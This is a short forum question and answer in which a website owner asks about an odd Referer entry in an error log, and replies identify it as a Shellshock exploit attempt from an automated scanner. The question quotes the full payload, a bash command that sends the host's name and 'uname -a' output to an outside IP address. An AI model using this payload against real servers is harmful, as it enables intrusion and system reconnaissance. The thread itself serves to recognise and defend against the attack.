# What is this strange referring link my website's error_log?

Tags: exploit

I've never seen a referrer in my error log which didn't come from at least a URL...what the heck is this?  Some kind of hack attempt?

```
referer: () { :;}; /bin/bash -c "echo SITE.COM/cgi-sys/php5  > /dev/tcp/67.228.177.7/23; /bin/uname -a > /dev/tcp/67.228.177.7/23; echo SITE.COM/cgi-sys/php5 > /dev/udp/67.228.177.7/80"
```

Answer (score 1, accepted):

This does look like an attempt to exploit the [Shellshock bash bug](http://en.wikipedia.org/wiki/Shellshock_%28software_bug%29).

Comment: How wonderful...since it didn't come from a URL, does that mean it came from a local shell?

Comment: @x80 Not necessarily.  It most likely came from a remote script that randomly scans websites.  Do remember that the referrer as you see it is just one of the headers that the client passes to the servers along with the request - if I am writing a program, I can make these headers anything I want.

Comment: Ahh thanks a bunch, that clears things up.  Just for safety's sake I've installed ossec, rkhunter, and cxs scan.  Can never be too careful with these hacker monsters out there nowadays...